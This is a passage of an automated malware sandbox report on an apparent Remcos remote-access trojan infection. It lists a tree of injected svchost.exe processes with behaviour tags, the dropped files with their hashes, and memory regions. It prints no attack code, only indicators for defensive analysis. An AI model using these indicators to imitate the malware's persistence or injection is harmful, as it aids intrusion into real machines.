                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5360
                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                    svchost.exe
                                                                    5⤵
                                                                      PID:5536
                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                      svchost.exe
                                                                      5⤵
                                                                        PID:5608
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                        • Modifies registry class
                                                                        PID:5224
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                        • Modifies registry class
                                                                        PID:5724
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4092
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Modifies registry class
                                                                        PID:5788
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                        • Modifies registry class
                                                                        PID:832
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                        • Modifies registry class
                                                                        PID:2484
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                        • Modifies registry class
                                                                        PID:2360
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Modifies registry class
                                                                        PID:736
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                        • Modifies registry class
                                                                        PID:3476
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Modifies registry class
                                                                        PID:2464
                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                        svchost.exe
                                                                        5⤵
                                                                          PID:408
                                                                        • C:\Windows\SysWOW64\svchost.exe
                                                                          svchost.exe
                                                                          5⤵
                                                                            PID:3936
                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                            svchost.exe
                                                                            5⤵
                                                                            • Modifies registry class
                                                                            PID:1972
                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                            svchost.exe
                                                                            5⤵
                                                                            • Modifies registry class
                                                                            PID:5452
                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                            svchost.exe
                                                                            5⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:764
                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                            svchost.exe
                                                                            5⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5744
                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                            svchost.exe
                                                                            5⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5256
                                                                  • C:\Windows\System32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                    1⤵
                                                                      PID:968

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\ProgramData\remcos\logs.dat

                                                                      Filesize

                                                                      140B

                                                                      MD5

                                                                      7f97a5278e4858657257520f2e817ed4

                                                                      SHA1

                                                                      26a656173562a2bcc6e06a4ff634c14ce4bff4a4

                                                                      SHA256

                                                                      cf215c0c17c0cba054c9a5a3357f8e8f114850e25927fd132078bf7aba3fe75b

                                                                      SHA512

                                                                      1d76fd251dec87669c04d02f36b63fc00398079a08cdfe95f058b612609c0c0a873fab18f51e6159c3842091545b9fbeaa324aeb4a38c665824ccafb9d55c574

                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jpobusib.hss.ps1

                                                                      Filesize

                                                                      60B

                                                                      MD5

                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                      SHA1

                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                      SHA256

                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                      SHA512

                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                    • C:\Users\Admin\AppData\Roaming\Theis.Wee

                                                                      Filesize

                                                                      440KB

                                                                      MD5

                                                                      101f0456c78a51dc6621f338fa0590e6

                                                                      SHA1

                                                                      744017fe918a845dfc161516dab0f86579912507

                                                                      SHA256

                                                                      3663b6fbf739bde311b85220fc41f266ec6f90cc6445c3ce77f3db94972aeac3

                                                                      SHA512

                                                                      f56f372d17ee4843b3c68831d66549ccd9d72a4effebac7c53f4dda841d5454f4599f736db890f055604e2b179eab4c43836162567bdd1e63a598a807386a5f0

                                                                    • memory/352-83-0x0000000000D60000-0x0000000000DE3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/352-81-0x0000000000D60000-0x0000000000DE3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/352-82-0x0000000000D60000-0x0000000000DE3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/1032-122-0x0000000001000000-0x0000000001083000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/1032-121-0x0000000001000000-0x0000000001083000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/1072-117-0x0000000000560000-0x00000000005E3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/1072-118-0x0000000000560000-0x00000000005E3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/1072-119-0x0000000000560000-0x00000000005E3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/1644-100-0x0000000001000000-0x0000000001083000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/1644-101-0x0000000001000000-0x0000000001083000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2184-40-0x0000000008AD0000-0x000000000B13F000-memory.dmp

                                                                      Filesize

                                                                      38.4MB

                                                                    • memory/2184-32-0x00000000064F0000-0x000000000650E000-memory.dmp

                                                                      Filesize

                                                                      120KB

                                                                    • memory/2184-34-0x0000000007EA0000-0x000000000851A000-memory.dmp

                                                                      Filesize

                                                                      6.5MB

                                                                    • memory/2184-35-0x0000000006A90000-0x0000000006AAA000-memory.dmp

                                                                      Filesize

                                                                      104KB

                                                                    • memory/2184-36-0x0000000007820000-0x00000000078B6000-memory.dmp

                                                                      Filesize

                                                                      600KB

                                                                    • memory/2184-37-0x0000000007720000-0x0000000007742000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                    • memory/2184-38-0x0000000008520000-0x0000000008AC4000-memory.dmp

                                                                      Filesize

                                                                      5.6MB

                                                                    • memory/2184-31-0x0000000005EE0000-0x0000000006234000-memory.dmp

                                                                      Filesize

                                                                      3.3MB

                                                                    • memory/2184-16-0x0000000002BE0000-0x0000000002C16000-memory.dmp

                                                                      Filesize

                                                                      216KB

                                                                    • memory/2184-17-0x0000000005750000-0x0000000005D78000-memory.dmp

                                                                      Filesize

                                                                      6.2MB

                                                                    • memory/2184-19-0x0000000005660000-0x0000000005682000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                    • memory/2184-20-0x0000000005D80000-0x0000000005DE6000-memory.dmp

                                                                      Filesize

                                                                      408KB

                                                                    • memory/2184-21-0x0000000005E30000-0x0000000005E96000-memory.dmp

                                                                      Filesize

                                                                      408KB

                                                                    • memory/2184-33-0x0000000006540000-0x000000000658C000-memory.dmp

                                                                      Filesize

                                                                      304KB

                                                                    • memory/2252-91-0x0000000000AD0000-0x0000000000B53000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2252-92-0x0000000000AD0000-0x0000000000B53000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2252-93-0x0000000000AD0000-0x0000000000B53000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2276-90-0x0000000000150000-0x00000000001D3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2276-89-0x0000000000150000-0x00000000001D3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2344-95-0x0000000000600000-0x0000000000683000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2344-97-0x0000000000600000-0x0000000000683000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2344-96-0x0000000000600000-0x0000000000683000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2416-67-0x0000000000C00000-0x0000000000C83000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2416-66-0x0000000000C00000-0x0000000000C83000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/2416-68-0x0000000000C00000-0x0000000000C83000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/3172-132-0x0000000000970000-0x00000000009F3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/3172-131-0x0000000000970000-0x00000000009F3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/3452-78-0x0000000000510000-0x0000000000593000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/3452-79-0x0000000000510000-0x0000000000593000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/3452-77-0x0000000000510000-0x0000000000593000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/3704-54-0x0000000001C10000-0x000000000427F000-memory.dmp

                                                                      Filesize

                                                                      38.4MB

                                                                    • memory/4000-126-0x00000000010E0000-0x0000000001163000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4000-125-0x00000000010E0000-0x0000000001163000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4000-124-0x00000000010E0000-0x0000000001163000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4080-75-0x0000000000140000-0x00000000001C3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4080-74-0x0000000000140000-0x00000000001C3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4080-73-0x0000000000140000-0x00000000001C3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4152-85-0x0000000001000000-0x0000000001083000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4152-84-0x0000000001000000-0x0000000001083000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4152-86-0x0000000001000000-0x0000000001083000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4212-104-0x0000000000CA0000-0x0000000000D23000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4212-102-0x0000000000CA0000-0x0000000000D23000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4212-103-0x0000000000CA0000-0x0000000000D23000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4456-129-0x0000000001090000-0x0000000001113000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4456-128-0x0000000001090000-0x0000000001113000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4456-127-0x0000000001090000-0x0000000001113000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4868-60-0x00007FFA91750000-0x00007FFA92211000-memory.dmp

                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/4868-18-0x00007FFA91750000-0x00007FFA92211000-memory.dmp

                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/4868-11-0x00007FFA91750000-0x00007FFA92211000-memory.dmp

                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/4868-12-0x00007FFA91750000-0x00007FFA92211000-memory.dmp

                                                                      Filesize

                                                                      10.8MB

                                                                    • memory/4868-14-0x00007FFA91753000-0x00007FFA91755000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/4868-1-0x0000022EFCFB0000-0x0000022EFCFD2000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                    • memory/4868-0-0x00007FFA91753000-0x00007FFA91755000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/4988-108-0x0000000001200000-0x0000000001283000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4988-107-0x0000000001200000-0x0000000001283000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/4988-106-0x0000000001200000-0x0000000001283000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5440-111-0x0000000000B20000-0x0000000000BA3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5440-110-0x0000000000B20000-0x0000000000BA3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5440-109-0x0000000000B20000-0x0000000000BA3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5600-65-0x0000000001030000-0x00000000010B3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5600-64-0x0000000001030000-0x00000000010B3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5600-63-0x0000000001030000-0x00000000010B3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5704-113-0x0000000000A00000-0x0000000000A83000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5704-115-0x0000000000A00000-0x0000000000A83000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5704-114-0x0000000000A00000-0x0000000000A83000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5852-71-0x0000000000150000-0x00000000001D3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5852-70-0x0000000000150000-0x00000000001D3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/5852-72-0x0000000000150000-0x00000000001D3000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/6096-56-0x0000000000E00000-0x0000000000E83000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/6096-55-0x0000000000E00000-0x0000000000E83000-memory.dmp

                                                                      Filesize

                                                                      524KB

                                                                    • memory/6096-57-0x0000000000E00000-0x0000000000E83000-memory.dmp

                                                                      Filesize

                                                                      524KB